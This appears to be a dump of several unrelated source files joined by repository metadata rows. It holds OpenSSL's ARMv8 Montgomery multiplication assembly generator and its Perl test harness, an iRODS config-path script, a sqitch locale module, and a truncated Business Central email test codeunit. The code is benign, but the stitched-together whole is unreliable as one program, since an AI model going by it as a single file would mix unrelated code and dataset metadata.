ldp $m0,$m1,[$t1,#8*0] // n[0..3]
ldp $m2,$m3,[$t1,#8*2]
add $np,$t1,#8*4
b.eq .Lmul4x_post
ldr $bi,[$bp]
ldp $a0,$a1,[$ap,#8*0] // a[0..3]
ldp $a2,$a3,[$ap,#8*2]
adds $ap,$ap,#8*4 // clear carry bit
mov $carry,xzr
mov $tp,sp
b .Loop_mul4x_reduction
.align 4
.Lmul4x_post:
// Final step. We see if result is larger than modulus, and
// if it is, subtract the modulus. But comparison implies
// subtraction. So we subtract modulus, see if it borrowed,
// and conditionally copy original value.
mov $rp,$t2
mov $ap_end,$t2 // $rp copy
subs $t0,$acc0,$m0
add $tp,sp,#8*8
sbcs $t1,$acc1,$m1
sub $cnt,$num,#8*4
.Lmul4x_sub:
sbcs $t2,$acc2,$m2
ldp $m0,$m1,[$np,#8*0]
sub $cnt,$cnt,#8*4
ldp $acc0,$acc1,[$tp,#8*0]
sbcs $t3,$acc3,$m3
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
ldp $acc2,$acc3,[$tp,#8*2]
add $tp,$tp,#8*4
stp $t0,$t1,[$rp,#8*0]
sbcs $t0,$acc0,$m0
stp $t2,$t3,[$rp,#8*2]
add $rp,$rp,#8*4
sbcs $t1,$acc1,$m1
cbnz $cnt,.Lmul4x_sub
sbcs $t2,$acc2,$m2
mov $tp,sp
add $ap,sp,#8*4
ldp $a0,$a1,[$ap_end,#8*0]
sbcs $t3,$acc3,$m3
stp $t0,$t1,[$rp,#8*0]
ldp $a2,$a3,[$ap_end,#8*2]
stp $t2,$t3,[$rp,#8*2]
ldp $acc0,$acc1,[$ap,#8*0]
ldp $acc2,$acc3,[$ap,#8*2]
sbcs xzr,$topmost,xzr // did it borrow?
ldr x30,[x29,#8] // pull return address
sub $cnt,$num,#8*4
.Lmul4x_cond_copy:
sub $cnt,$cnt,#8*4
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
ldp $a0,$a1,[$ap_end,#8*4]
ldp $acc0,$acc1,[$ap,#8*4]
csel $t2,$acc2,$a2,lo
stp xzr,xzr,[$tp,#8*2]
add $tp,$tp,#8*4
csel $t3,$acc3,$a3,lo
ldp $a2,$a3,[$ap_end,#8*6]
ldp $acc2,$acc3,[$ap,#8*6]
add $ap,$ap,#8*4
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
add $ap_end,$ap_end,#8*4
cbnz $cnt,.Lmul4x_cond_copy
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
stp xzr,xzr,[$tp,#8*2]
csel $t2,$acc2,$a2,lo
stp xzr,xzr,[$tp,#8*3]
csel $t3,$acc3,$a3,lo
stp xzr,xzr,[$tp,#8*4]
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
b .Lmul4x_done
.align 4
.Lmul4x4_post_condition:
adc $carry,$carry,xzr
ldr $ap,[x29,#96] // pull rp
// $acc0-3,$carry hold result, $m0-7 hold modulus
subs $a0,$acc0,$m0
ldr x30,[x29,#8] // pull return address
sbcs $a1,$acc1,$m1
stp xzr,xzr,[sp,#8*0]
sbcs $a2,$acc2,$m2
stp xzr,xzr,[sp,#8*2]
sbcs $a3,$acc3,$m3
stp xzr,xzr,[sp,#8*4]
sbcs xzr,$carry,xzr // did it borrow?
stp xzr,xzr,[sp,#8*6]
// $a0-3 hold result-modulus
csel $a0,$acc0,$a0,lo
csel $a1,$acc1,$a1,lo
csel $a2,$acc2,$a2,lo
csel $a3,$acc3,$a3,lo
stp $a0,$a1,[$ap,#8*0]
stp $a2,$a3,[$ap,#8*2]
.Lmul4x_done:
ldp x19,x20,[x29,#16]
mov sp,x29
ldp x21,x22,[x29,#32]
mov x0,#1
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldr x29,[sp],#128
.inst 0xd50323bf // autiasp
ret
.size __bn_mul4x_mont,.-__bn_mul4x_mont
___
}
$code.=<<___;
.asciz "Montgomery Multiplication for ARMv8, CRYPTOGAMS by <appro\@openssl.org>"
.align 4
___
print $code;
close STDOUT or die "error closing STDOUT: $!";
| 24.508564 | 80 | 0.551607 |
73d4d91931c08a89f7b75d8fc38e65720f5625f0 | 11,031 | pl | Perl | test/run_tests.pl | JedrzejczykRobert/openssl | 2bd2a4c8e8c8cdc614f0a2c4afae52a04d397bf3 | [
"Apache-2.0"
] | 1 | 2020-09-17T05:36:02.000Z | 2020-09-17T05:36:02.000Z | test/run_tests.pl | tomsteal1/openssl | 79410c5f8b139c423be436810b4fe4de4637fc24 | [
"Apache-2.0"
] | 3 | 2020-08-16T07:46:15.000Z | 2020-09-02T20:14:32.000Z | test/run_tests.pl | tomsteal1/openssl | 79410c5f8b139c423be436810b4fe4de4637fc24 | [
"Apache-2.0"
] | 1 | 2020-07-28T01:49:05.000Z | 2020-07-28T01:49:05.000Z | #! /usr/bin/env perl
# Copyright 2015-2020 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the Apache License 2.0 (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
use strict;
use warnings;
# Recognise VERBOSE aka V which is common on other projects.
# Additionally, recognise VERBOSE_FAILURE aka VF aka REPORT_FAILURES
# and recognise VERBOSE_FAILURE_PROGRESS aka VFP aka REPORT_FAILURES_PROGRESS.
BEGIN {
$ENV{HARNESS_VERBOSE} = "yes" if $ENV{VERBOSE} || $ENV{V};
$ENV{HARNESS_VERBOSE_FAILURE} = "yes"
if $ENV{VERBOSE_FAILURE} || $ENV{VF} || $ENV{REPORT_FAILURES};
$ENV{HARNESS_VERBOSE_FAILURE_PROGRESS} = "yes"
if ($ENV{VERBOSE_FAILURE_PROGRESS} || $ENV{VFP}
|| $ENV{REPORT_FAILURES_PROGRESS});
}
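# For example, assuming the usual "make test" wrapper around this script:
#   VERBOSE=1 make test     # full TAP output for every test
#   VF=1 make test          # re-print the output of failed tests afterwards
#   VFP=1 make test         # ...and also show per-test progress while reporting failures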
use File::Spec::Functions qw/catdir catfile curdir abs2rel rel2abs/;
use File::Basename;
use FindBin;
use lib "$FindBin::Bin/../util/perl";
use OpenSSL::Glob;
my $srctop = $ENV{SRCTOP} || $ENV{TOP};
my $bldtop = $ENV{BLDTOP} || $ENV{TOP};
my $recipesdir = catdir($srctop, "test", "recipes");
my $libdir = rel2abs(catdir($srctop, "util", "perl"));
my $jobs = $ENV{HARNESS_JOBS};
$ENV{OPENSSL_CONF} = rel2abs(catdir($srctop, "apps", "openssl.cnf"));
$ENV{OPENSSL_CONF_INCLUDE} = rel2abs(catdir($bldtop, "providers"));
$ENV{OPENSSL_MODULES} = rel2abs(catdir($bldtop, "providers"));
$ENV{OPENSSL_ENGINES} = rel2abs(catdir($bldtop, "engines"));
$ENV{CTLOG_FILE} = rel2abs(catdir($srctop, "test", "ct", "log_list.cnf"));
my %tapargs =
( verbosity => $ENV{HARNESS_VERBOSE} ? 1 : 0,
lib => [ $libdir ],
switches => '-w',
merge => 1,
);
$tapargs{jobs} = $jobs if defined $jobs;
# Additional OpenSSL special TAP arguments. Because we can't pass them via
# TAP::Harness->new(), they will be accessed directly, see the
# TAP::Parser::OpenSSL implementation further down
my %openssl_args = ();
$openssl_args{'failure_verbosity'} = $ENV{HARNESS_VERBOSE} ? 0 :
$ENV{HARNESS_VERBOSE_FAILURE_PROGRESS} ? 2 :
1; # $ENV{HARNESS_VERBOSE_FAILURE}
print "Warning: HARNESS_VERBOSE overrides HARNESS_VERBOSE_FAILURE*\n"
if ($ENV{HARNESS_VERBOSE} && ($ENV{HARNESS_VERBOSE_FAILURE}
|| $ENV{HARNESS_VERBOSE_FAILURE_PROGRESS}));
print "Warning: HARNESS_VERBOSE_FAILURE_PROGRESS overrides HARNESS_VERBOSE_FAILURE\n"
if ($ENV{HARNESS_VERBOSE_FAILURE_PROGRESS} && $ENV{HARNESS_VERBOSE_FAILURE});
my $outfilename = $ENV{HARNESS_TAP_COPY};
open $openssl_args{'tap_copy'}, ">$outfilename"
or die "Trying to create $outfilename: $!\n"
if defined $outfilename;
my @alltests = find_matching_tests("*");
my %tests = ();
sub reorder {
my $key = pop;
# for parallel test runs, do slow tests first
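    # (e.g. "80-test_ssl_new.t" is ordered as if it were "00-test_ssl_new.t")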
if (defined $jobs && $jobs > 1 && $key =~ m/test_ssl_new|test_fuzz/) {
$key =~ s/(\d+)-/00-/;
}
return $key;
}
my $initial_arg = 1;
foreach my $arg (@ARGV ? @ARGV : ('alltests')) {
if ($arg eq 'list') {
foreach (@alltests) {
(my $x = basename($_)) =~ s|^[0-9][0-9]-(.*)\.t$|$1|;
print $x,"\n";
}
exit 0;
}
if ($arg eq 'alltests') {
warn "'alltests' encountered, ignoring everything before that...\n"
unless $initial_arg;
%tests = map { $_ => 1 } @alltests;
} elsif ($arg =~ m/^(-?)(.*)/) {
my $sign = $1;
my $test = $2;
my @matches = find_matching_tests($test);
# If '-foo' is the first arg, it's short for 'alltests -foo'
if ($sign eq '-' && $initial_arg) {
%tests = map { $_ => 1 } @alltests;
}
if (scalar @matches == 0) {
warn "Test $test found no match, skipping ",
($sign eq '-' ? "removal" : "addition"),
"...\n";
} else {
foreach $test (@matches) {
if ($sign eq '-') {
delete $tests{$test};
} else {
$tests{$test} = 1;
}
}
}
} else {
warn "I don't know what '$arg' is about, ignoring...\n";
}
$initial_arg = 0;
}
sub find_matching_tests {
my ($glob) = @_;
if ($glob =~ m|^[\d\[\]\?\-]+$|) {
return glob(catfile($recipesdir,"$glob-*.t"));
}
return glob(catfile($recipesdir,"*-$glob.t"));
}
# The following is quite a bit of hackery to adapt to both TAP::Harness
# and Test::Harness, depending on what's available.
# The TAP::Harness hack allows support for HARNESS_VERBOSE_FAILURE* and
# HARNESS_TAP_COPY, while the Test::Harness hack can't, because the pre
# TAP::Harness Test::Harness simply doesn't have support for this sort of
# thing.
#
# We use eval to avoid undue interruption if TAP::Harness isn't present.
my $package;
my $eres;
$eres = eval {
package TAP::Parser::OpenSSL;
use parent 'TAP::Parser';
sub new {
my $class = shift;
my %opts = %{ shift() };
my $failure_verbosity = $openssl_args{failure_verbosity};
my @plans = (); # initial level, no plan yet
my $output_buffer = "";
# We rely heavily on perl closures to make failure verbosity work
# We need to do so, because there's no way to safely pass extra
# objects down all the way to the TAP::Parser::Result object
my @failure_output = ();
my %callbacks = ();
if ($failure_verbosity > 0 || defined $openssl_args{tap_copy}) {
$callbacks{ALL} = sub { # on each line of test output
my $self = shift;
my $fh = $openssl_args{tap_copy};
print $fh $self->as_string, "\n"
if defined $fh;
my $failure_verbosity = $openssl_args{failure_verbosity};
if ($failure_verbosity > 0) {
my $is_plan = $self->is_plan;
my $tests_planned = $is_plan && $self->tests_planned;
my $is_test = $self->is_test;
my $is_ok = $is_test && $self->is_ok;
# workaround for parser not coping with sub-test indentation
if ($self->is_unknown) {
my $level = $#plans;
my $indent = $level < 0 ? "" : " " x ($level * 4);
($is_plan, $tests_planned) = (1, $1)
if ($self->as_string =~ m/^$indent 1\.\.(\d+)/);
($is_test, $is_ok) = (1, !$1)
if ($self->as_string =~ m/^$indent(not )?ok /);
}
if ($is_plan) {
push @plans, $tests_planned;
$output_buffer = ""; # ignore comments etc. until plan
} elsif ($is_test) { # result of a test
pop @plans if @plans && --($plans[-1]) <= 0;
print $output_buffer if !$is_ok;
print "\n".$self->as_string
if !$is_ok || $failure_verbosity == 2;
print "\n# ------------------------------------------------------------------------------" if !$is_ok;
$output_buffer = "";
} elsif ($self->as_string ne "") {
# typically is_comment or is_unknown
$output_buffer .= "\n".$self->as_string;
}
}
}
}
if ($failure_verbosity > 0) {
$callbacks{EOF} = sub {
my $self = shift;
# We know we are a TAP::Parser::Aggregator object
if (scalar $self->failed > 0 && @failure_output) {
# We add an extra empty line, because in the case of a
# progress counter, we're still at the end of that progress
# line.
print $_, "\n" foreach (("", @failure_output));
}
# Echo any trailing comments etc.
print "$output_buffer";
};
}
if (keys %callbacks) {
# If %opts already has a callbacks element, the order here
# ensures we do not override it
%opts = ( callbacks => { %callbacks }, %opts );
}
return $class->SUPER::new({ %opts });
}
package TAP::Harness::OpenSSL;
use parent 'TAP::Harness';
package main;
$tapargs{parser_class} = "TAP::Parser::OpenSSL";
$package = 'TAP::Harness::OpenSSL';
};
unless (defined $eres) {
$eres = eval {
# Fake TAP::Harness in case it's not loaded
package TAP::Harness::fake;
use parent 'Test::Harness';
sub new {
my $class = shift;
my %args = %{ shift() };
return bless { %args }, $class;
}
sub runtests {
my $self = shift;
# Pre TAP::Harness Test::Harness doesn't support [ filename, name ]
# elements, so convert such elements to just be the filename
my @args = map { ref($_) eq 'ARRAY' ? $_->[0] : $_ } @_;
my @switches = ();
if ($self->{switches}) {
push @switches, $self->{switches};
}
if ($self->{lib}) {
foreach (@{$self->{lib}}) {
my $l = $_;
# It seems that $switches is getting interpreted with 'eval'
# or something like that, and that we need to take care of
# backslashes or they will disappear along the way.
$l =~ s|\\|\\\\|g if $^O eq "MSWin32";
push @switches, "-I$l";
}
}
$Test::Harness::switches = join(' ', @switches);
Test::Harness::runtests(@args);
}
package main;
$package = 'TAP::Harness::fake';
};
}
unless (defined $eres) {
print $@,"\n" if $@;
print $!,"\n" if $!;
exit 127;
}
my $harness = $package->new(\%tapargs);
my $ret =
$harness->runtests(map { [ abs2rel($_, rel2abs(curdir())), basename($_) ] }
sort { reorder($a) cmp reorder($b) } keys %tests);
# $ret->has_errors may be any number, not just 0 or 1. On VMS, numbers
# from 2 and on are used as is as VMS statuses, which have severity encoded
# in the lower 3 bits. 0 and 1, on the other hand, generate SUCCESS and
# FAILURE, so for correct reporting on all platforms, we make sure the only
# exit codes are 0 and 1. Double-bang is the trick to do so.
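# (e.g. has_errors == 5 would otherwise leak through as-is; !!5 collapses it to 1)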
exit !!$ret->has_errors if (ref($ret) eq "TAP::Parser::Aggregator");
# If this isn't a TAP::Parser::Aggregator, it's the pre-TAP test harness,
# which simply dies at the end if any test failed, so we don't need to bother
# with any exit code in that case.
| 36.04902 | 126 | 0.534494 |
ed620257404a007ded4d2897d5aa2cbe8da92a95 | 380 | pl | Perl | iRODS/scripts/perl/irods_get_config_dir.pl | iychoi/cyverse-irods | 0070b8677a82e763f1d940ae6537b1c8839a628a | [
"BSD-3-Clause"
] | null | null | null | iRODS/scripts/perl/irods_get_config_dir.pl | iychoi/cyverse-irods | 0070b8677a82e763f1d940ae6537b1c8839a628a | [
"BSD-3-Clause"
] | 6 | 2019-12-02T18:17:44.000Z | 2019-12-02T18:17:57.000Z | iRODS/scripts/perl/irods_get_config_dir.pl | iychoi/cyverse-irods | 0070b8677a82e763f1d940ae6537b1c8839a628a | [
"BSD-3-Clause"
] | 1 | 2019-12-02T05:40:13.000Z | 2019-12-02T05:40:13.000Z | use Cwd "abs_path";
use File::Basename;
use File::Spec;
$scriptfullpath = abs_path(__FILE__);
$scripttoplevel = dirname(dirname(dirname(dirname($scriptfullpath))));
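# A packaged (binary) install keeps its configuration in /etc/irods;
# a source tree keeps it under iRODS/config.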
if ( -e "$scripttoplevel/packaging/binary_installation.flag" )
{
$configDir = "/etc/irods";
}
else
{
$configDir = File::Spec->catdir( "$scripttoplevel", "iRODS", "config" );
}
print "$configDir";
| 21.111111 | 80 | 0.678947 |
ed95ae760fa2cc808e100d5fa7ee6cc58c50748b | 391 | pm | Perl | t/lib/LC.pm | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | 1,016 | 2018-05-30T20:09:27.000Z | 2022-03-23T02:02:14.000Z | t/lib/LC.pm | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | 241 | 2018-05-30T19:50:54.000Z | 2022-03-27T18:42:12.000Z | t/lib/LC.pm | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | 87 | 2018-06-06T13:38:19.000Z | 2022-03-30T10:17:44.000Z | package LC;
our $TIME = do {
if ($^O eq 'MSWin32') {
require Win32::Locale;
Win32::Locale::get_locale();
} else {
require POSIX;
POSIX::setlocale( POSIX::LC_TIME() );
}
};
# https://github.com/sqitchers/sqitch/issues/230#issuecomment-103946451
# https://rt.cpan.org/Ticket/Display.html?id=104574
$TIME = 'en_US_POSIX' if $TIME eq 'C.UTF-8';
1;
| 21.722222 | 71 | 0.608696 |
eda805893fff5cfc149f12e14c3bafe2cee23adf | 66,524 | al | Perl | Modules/System Tests/Email/src/EmailTest.Codeunit.al | AndersLarsenMicrosoft/ALAppExtensions | 31000fa1bb6bedac17a8141e2ac1ab607e466ec5 | [
"MIT"
] | 1 | 2022-03-28T01:20:39.000Z | 2022-03-28T01:20:39.000Z | Modules/System Tests/Email/src/EmailTest.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | null | null | null | Modules/System Tests/Email/src/EmailTest.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | null | null | null | // ------------------------------------------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for license information.
// ------------------------------------------------------------------------------------------------
codeunit 134685 "Email Test"
{
Subtype = Test;
Permissions = tabledata "Email Message" = rd,
tabledata "Email Message Attachment" = rd,
tabledata "Email Recipient" = rd,
tabledata "Email Outbox" = rimd,
tabledata "Scheduled Task" = rd,
tabledata "Sent Email" = rid;
EventSubscriberInstance = Manual;
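// Subscribers in this codeunit only run while a test has explicitly bound them via BindSubscription.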
var
Assert: Codeunit "Library Assert";
Email: Codeunit Email;
Base64Convert: Codeunit "Base64 Convert";
PermissionsMock: Codeunit "Permissions Mock";
EmailMessageDoesNotExistMsg: Label 'The email message has been deleted by another user.', Locked = true;
EmailMessageOpenPermissionErr: Label 'You do not have permission to open the email message.';
EmailMessageCannotBeEditedErr: Label 'The email message has already been sent and cannot be edited.';
EmailMessageQueuedCannotDeleteAttachmentErr: Label 'Cannot delete the attachment because the email has been queued to be sent.';
EmailMessageSentCannotDeleteAttachmentErr: Label 'Cannot delete the attachment because the email has already been sent.';
AccountNameLbl: Label '%1 (%2)', Locked = true;
NoRelatedAttachmentsErr: Label 'Did not find any attachments related to this email.';
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure NonExistingEmailMessageFailsTest()
var
Message: Record "Email Message";
EmailMessage: Codeunit "Email Message";
begin
// [Scenario] User cannot save as draft, enqueue, send or open (in editor) a non-existing email message
PermissionsMock.Set('Email Edit');
// [Given] Create an Email Message and delete the underlying record
CreateEmail(EmailMessage);
Assert.IsTrue(Message.Get(EmailMessage.GetId()), 'The record should have been created');
Message.Delete();
Assert.IsFalse(EmailMessage.Get(EmailMessage.GetId()), 'The email should not exist');
// [When] Saving a non-existing email message as draft
ClearLastError();
asserterror Email.SaveAsDraft(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Enqueuing a non-existing email message
ClearLastError();
asserterror Email.Enqueue(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Sending a non-existing email message
ClearLastError();
asserterror Email.Send(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Opening a non-existing email message
ClearLastError();
asserterror Email.OpenInEditor(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Opening a non-existing email message modally
ClearLastError();
asserterror Email.OpenInEditorModally(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure SaveAsDraftEmailMessage()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmptyConnector: Enum "Email Connector";
EmptyGuid: Guid;
begin
// [Scenario] When saving an existing email as draft, it appears in the outbox
PermissionsMock.Set('Email Edit');
// [Given] An email message
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
// [When] Saving the email message as draft
ClearLastError();
Email.SaveAsDraft(EmailMessage);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when saving an email.');
// [Then] The draft email should be correct
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one draft email');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be in the outbox');
Assert.AreEqual(EmptyGuid, EmailOutbox."Account Id", 'The account should not be set');
Assert.AreEqual(EmptyConnector, EmailOutbox.Connector, 'The connector should not be set');
Assert.AreEqual(EmailOutbox.Status::"Draft", EmailOutbox.Status, 'The status should be ''Draft''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure SaveAsDraftEmailMessageTwice()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmptyConnector: Enum "Email Connector";
EmptyGuid: Guid;
begin
// [Scenario] When saving an existing email as draft twice, only one entry appears in the outbox
PermissionsMock.Set('Email Edit');
// [Given] An email message
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
// [When] Saving the email message as draft
ClearLastError();
Email.SaveAsDraft(EmailMessage);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when saving the email message.');
// [Then] The draft email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one enqueued message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(EmptyGuid, EmailOutbox."Account Id", 'The account should not be set');
Assert.AreEqual(EmptyConnector, EmailOutbox.Connector, 'The connector should not be set');
Assert.AreEqual(EmailOutbox.Status::"Draft", EmailOutbox.Status, 'The status should be ''Draft''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
// [When] Saving the email message again
ClearLastError();
Email.SaveAsDraft(EmailMessage);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when saving the email message again.');
// [Then] The draft email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one draft message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(EmptyGuid, EmailOutbox."Account Id", 'The account should not be set');
Assert.AreEqual(EmptyConnector, EmailOutbox.Connector, 'The connector should not be set');
Assert.AreEqual(EmailOutbox.Status::"Draft", EmailOutbox.Status, 'The status should be ''Draft''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
end;
[Test]
[HandlerFunctions('CloseEmailEditorHandler')]
procedure OpenMessageInEditorTest()
var
TempAccount: Record "Email Account" temporary;
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
Recipients: List of [Text];
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
Recipients.Add('recipient1@test.com');
Recipients.Add('recipient2@test.com');
EmailMessage.Create(Recipients, 'Test subject', 'Test body', true);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage);
// Verify
Assert.AreEqual('', EmailEditor.Account.Value(), 'Account field was not blank.');
Assert.AreEqual('recipient1@test.com;recipient2@test.com', EmailEditor.ToField.Value(), 'A different To was expected');
Assert.AreEqual('Test subject', EmailEditor.SubjectField.Value(), 'A different subject was expected.');
Assert.AreEqual('Test body', EmailEditor.BodyField.Value(), 'A different body was expected.');
Assert.AreEqual('', EmailEditor.CcField.Value(), 'Cc field was not blank.');
Assert.AreEqual('', EmailEditor.BccField.Value(), 'Bcc field was not blank.');
Assert.IsTrue(EmailEditor.Attachments.First(), 'First Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
Assert.IsTrue(EmailEditor.Attachments.Next(), 'Second Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage, TempAccount);
// Verify
Assert.AreEqual(StrSubstNo(AccountNameLbl, TempAccount.Name, TempAccount."Email Address"), EmailEditor.Account.Value(), 'A different account was expected');
Assert.AreEqual('recipient1@test.com;recipient2@test.com', EmailEditor.ToField.Value(), 'A different To was expected');
Assert.AreEqual('Test subject', EmailEditor.SubjectField.Value(), 'A different subject was expected.');
Assert.AreEqual('Test body', EmailEditor.BodyField.Value(), 'A different body was expected.');
Assert.AreEqual('', EmailEditor.CcField.Value(), 'Cc field was not blank.');
Assert.AreEqual('', EmailEditor.BccField.Value(), 'Bcc field was not blank.');
Assert.IsTrue(EmailEditor.Attachments.First(), 'First Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
Assert.IsTrue(EmailEditor.Attachments.Next(), 'Second Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage, TempAccount);
// Verify
Assert.AreEqual(StrSubstNo(AccountNameLbl, TempAccount.Name, TempAccount."Email Address"), EmailEditor.Account.Value(), 'A different account was expected');
Assert.AreEqual('recipient1@test.com;recipient2@test.com', EmailEditor.ToField.Value(), 'A different To was expected');
Assert.AreEqual('Test subject', EmailEditor.SubjectField.Value(), 'A different subject was expected.');
Assert.AreEqual('Test body', EmailEditor.BodyField.Value(), 'A different body was expected.');
Assert.AreEqual('', EmailEditor.CcField.Value(), 'Cc field was not blank.');
Assert.AreEqual('', EmailEditor.BccField.Value(), 'Bcc field was not blank.');
Assert.IsTrue(EmailEditor.Attachments.First(), 'First Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
Assert.IsTrue(EmailEditor.Attachments.Next(), 'Second Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
end;
[Test]
[TransactionModel(TransactionModel::AutoRollback)]
procedure OpenMessageInEditorForAQueuedMessageTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutBox: Record "Email Outbox";
EmailMessageAttachment: Record "Email Message Attachment";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailOutBox.Init();
EmailOutBox."Account Id" := TempAccount."Account Id";
EmailOutBox.Connector := Enum::"Email Connector"::"Test Email Connector";
EmailOutBox."Message Id" := EmailMessage.GetId();
EmailOutBox.Status := Enum::"Email Status"::Queued;
EmailOutBox."User Security Id" := UserSecurityId();
EmailOutBox.Insert();
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage);
// Verify
Assert.IsFalse(EmailEditor.Account.Enabled(), 'Account field was enabled');
Assert.IsFalse(EmailEditor.ToField.Editable(), 'To field was editable');
Assert.IsFalse(EmailEditor.CcField.Editable(), 'Cc field was editable');
Assert.IsFalse(EmailEditor.BccField.Editable(), 'Bcc field was editable');
Assert.IsFalse(EmailEditor.SubjectField.Editable(), 'Subject field was editable');
Assert.IsFalse(EmailEditor.BodyField.Editable(), 'Body field was editable');
#if not CLEAN19
Assert.IsFalse(EmailEditor.Upload.Enabled(), 'Upload Action was not disabled.');
#else
Assert.IsFalse(EmailEditor.Attachments.Upload.Visible(), 'Upload Action is visible.');
#endif
Assert.IsFalse(EmailEditor.Send.Enabled(), 'Send Action was not disabled.');
EmailOutBox.Status := Enum::"Email Status"::Processing;
EmailOutBox.Modify();
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage);
// Verify
Assert.IsFalse(EmailEditor.Account.Enabled(), 'Account field was enabled');
Assert.IsFalse(EmailEditor.ToField.Editable(), 'To field was editable');
Assert.IsFalse(EmailEditor.CcField.Editable(), 'Cc field was editable');
Assert.IsFalse(EmailEditor.BccField.Editable(), 'Bcc field was editable');
